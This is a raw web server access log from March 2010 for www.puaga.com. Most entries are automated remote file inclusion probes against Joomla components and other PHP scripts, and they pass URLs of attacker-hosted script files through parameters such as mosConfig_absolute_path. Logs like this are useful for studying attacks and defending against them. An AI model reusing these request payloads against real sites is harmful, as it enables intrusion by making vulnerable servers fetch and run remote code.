122.201.102.68 - - [07/Mar/2010:05:08:49 -0800] "GET /logs/access_100209.log%20%20///setup.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.102.68 - - [07/Mar/2010:05:09:08 -0800] "GET /logs/access_100213.log%20%20///setup.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.102.68 - - [07/Mar/2010:05:09:08 -0800] "GET //setup.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.102.68 - - [07/Mar/2010:05:09:08 -0800] "GET /logs///setup.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:09:20 -0800] "GET /logs/access_100219.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:09:20 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:09:20 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:09:21 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.102.68 - - [07/Mar/2010:05:09:36 -0800] "GET /logs/access_100209.log%20%20///setup.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:09:40 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:09:40 -0800] "GET /logs/access_100219.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:09:40 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:09:40 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:05:10:12 -0800] "GET /logs/access_100219.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:11:03 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:11:03 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:11:03 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:11:11 -0800] "GET /logs/access_100217.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [07/Mar/2010:05:11:22 -0800] "GET /logs/access_100205.log%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
212.241.177.123 - - [07/Mar/2010:05:11:32 -0800] "GET /http://bazyngan.at.ua/idx.jpg? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
212.241.177.123 - - [07/Mar/2010:05:11:32 -0800] "GET /http://bazyngan.at.ua/idx.jpg? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:05:13:08 -0800] "GET /logs//?file=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
84.38.160.77 - - [07/Mar/2010:05:13:09 -0800] "GET /logs/access_100205.log%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:05:13:09 -0800] "GET /logs/access_100204.log%20%20//?file=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:05:13:09 -0800] "GET /?file=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [07/Mar/2010:05:15:18 -0800] "GET /http://www.herve-leger-store.com/asu2.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:15:44 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:15:44 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:15:44 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:15:50 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:15:50 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:15:50 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:16:23 -0800] "GET /logs/access_100217.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:16:38 -0800] "GET /logs/access_100217.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [07/Mar/2010:05:17:25 -0800] "GET /tools/send_reminders.php?noSet=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [07/Mar/2010:05:17:25 -0800] "GET /logs//tools/send_reminders.php?noSet=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [07/Mar/2010:05:17:26 -0800] "GET /logs/access_100202.log%20%20//tools/send_reminders.php?noSet=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [07/Mar/2010:05:17:48 -0800] "GET /logs/access_100215.log%20%20//tools/send_reminders.php?noSet=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [07/Mar/2010:05:17:53 -0800] "GET /logs/access_100217.log/http://bazyngan.at.ua/idx.jpg? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
212.241.177.123 - - [07/Mar/2010:05:17:53 -0800] "GET /http://bazyngan.at.ua/idx.jpg? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
212.241.177.123 - - [07/Mar/2010:05:17:53 -0800] "GET /logs/http://bazyngan.at.ua/idx.jpg? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
212.241.177.123 - - [07/Mar/2010:05:17:57 -0800] "GET /logs/access_100217.log/http://bazyngan.at.ua/idx.jpg? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
212.241.177.123 - - [07/Mar/2010:05:17:57 -0800] "GET /http://bazyngan.at.ua/idx.jpg? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
212.241.177.123 - - [07/Mar/2010:05:17:57 -0800] "GET /logs/http://bazyngan.at.ua/idx.jpg? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:18:03 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:18:03 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:18:03 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:18:03 -0800] "GET /logs/access_100219.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [07/Mar/2010:05:19:08 -0800] "GET /admin.admin.html.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [07/Mar/2010:05:19:08 -0800] "GET /logs/access_100207.log%20%20//admin.admin.html.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [07/Mar/2010:05:19:08 -0800] "GET /logs//admin.admin.html.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [07/Mar/2010:05:19:45 -0800] "GET /playing.php/common/db.php?commonpath=http://boats.uksi.ru/sh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [07/Mar/2010:05:19:46 -0800] "GET /logs/playing.php/common/db.php?commonpath=http://boats.uksi.ru/sh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [07/Mar/2010:05:19:46 -0800] "GET /logs/access_100131.log%20%20/playing.php/common/db.php?commonpath=http://boats.uksi.ru/sh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [07/Mar/2010:05:19:47 -0800] "GET /logs/access_100207.log%20%20//admin.admin.html.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [07/Mar/2010:05:19:47 -0800] "GET /admin.admin.html.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [07/Mar/2010:05:19:47 -0800] "GET /logs//admin.admin.html.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [07/Mar/2010:05:20:45 -0800] "GET /logs/playing.php/common/db.php?commonpath=http://boats.uksi.ru/sh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [07/Mar/2010:05:20:45 -0800] "GET /playing.php/common/db.php?commonpath=http://boats.uksi.ru/sh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [07/Mar/2010:05:20:45 -0800] "GET /logs/access_100131.log/playing.php/common/db.php?commonpath=http://boats.uksi.ru/sh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.150.203 - - [07/Mar/2010:05:22:16 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.163.150.203 - - [07/Mar/2010:05:22:20 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.150.203 - - [07/Mar/2010:05:22:20 -0800] "GET /logs/access_100213.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [07/Mar/2010:05:22:48 -0800] "GET /logs/access_100207.log//admin.admin.html.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [07/Mar/2010:05:22:48 -0800] "GET /logs/access_100213.log//admin.admin.html.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [07/Mar/2010:05:23:12 -0800] "GET /logs/access_100214.log/playing.php/common/db.php?commonpath=http://boats.uksi.ru/sh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [07/Mar/2010:05:23:13 -0800] "GET /logs/access_100213.log//admin.admin.html.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [07/Mar/2010:05:23:13 -0800] "GET /logs/access_100207.log//admin.admin.html.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.203.180.144 - - [07/Mar/2010:05:24:13 -0800] "GET /-DSSL? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
69.175.39.122 - - [07/Mar/2010:05:24:48 -0800] "GET /logs/access_100207.log/http://www.herve-leger-store.com/asu2.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
69.175.39.122 - - [07/Mar/2010:05:24:48 -0800] "GET /http://www.herve-leger-store.com/asu2.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
69.175.39.122 - - [07/Mar/2010:05:24:48 -0800] "GET /logs/http://www.herve-leger-store.com/asu2.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:25:33 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:25:34 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:25:34 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:25:40 -0800] "GET /logs/access_100217.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [07/Mar/2010:05:25:41 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.leaderpmc.com/banner/id.txt??? HTTP/1.1" 200 4950 "-" "libwww-perl/5.813" "www.puaga.com"
77.241.83.107 - - [07/Mar/2010:05:25:42 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.leaderpmc.com/banner/id.txt??? HTTP/1.0" 200 3626 "-" "libwww-perl/5.813" "www.puaga.com"
194.249.18.67 - - [07/Mar/2010:05:28:51 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [07/Mar/2010:05:28:51 -0800] "GET /logs/access_100213.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [07/Mar/2010:05:28:52 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [07/Mar/2010:05:29:00 -0800] "GET /logs/access_100201.log/////?_SERVER[DOCUMENT_ROOT]=http://www.leaderpmc.com/banner/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
194.249.18.67 - - [07/Mar/2010:05:29:15 -0800] "GET /logs/access_100213.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [07/Mar/2010:05:29:15 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [07/Mar/2010:05:29:16 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:29:19 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:29:19 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:29:22 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:29:35 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:29:35 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:29:35 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:30:04 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:30:04 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:30:05 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:30:14 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:30:14 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:30:14 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:30:32 -0800] "GET /logs/access_100219.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [07/Mar/2010:05:33:21 -0800] "GET /zboard/skin/dognara_gallery/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [07/Mar/2010:05:33:21 -0800] "GET /logs/access_100213.log%20%20//zboard/skin/dognara_gallery/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [07/Mar/2010:05:33:21 -0800] "GET /logs//zboard/skin/dognara_gallery/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [07/Mar/2010:05:33:23 -0800] "GET /logs/access_100213.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [07/Mar/2010:05:33:27 -0800] "GET /logs/access_100213.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [07/Mar/2010:05:33:46 -0800] "GET /logs/access_100218.log%20%20//zboard/skin/dognara_gallery/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.150.203 - - [07/Mar/2010:05:35:57 -0800] "GET /logs/access_100213.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.150.203 - - [07/Mar/2010:05:36:00 -0800] "GET /logs/access_100205.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.249.65.171 - - [07/Mar/2010:05:37:51 -0800] "GET /atesh_info/lt.php?t=4727021758 HTTP/1.1" 200 88 "-" "Googlebot-Image/1.0" "www.atesh.info"
174.142.61.173 - - [07/Mar/2010:05:37:52 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [07/Mar/2010:05:37:52 -0800] "GET /logs/access_100131.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [07/Mar/2010:05:37:52 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [07/Mar/2010:05:38:39 -0800] "GET /logs/access_100219.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [07/Mar/2010:05:38:39 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [07/Mar/2010:05:38:41 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.80.193.35 - - [07/Mar/2010:05:38:46 -0800] "GET / HTTP/1.0" 200 3626 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; IEMB3; (R1 1.5))" "puaga.com"
174.142.61.173 - - [07/Mar/2010:05:38:51 -0800] "GET /logs/access_100131.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [07/Mar/2010:05:38:51 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [07/Mar/2010:05:38:53 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [07/Mar/2010:05:39:55 -0800] "GET /logs/access_100219.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
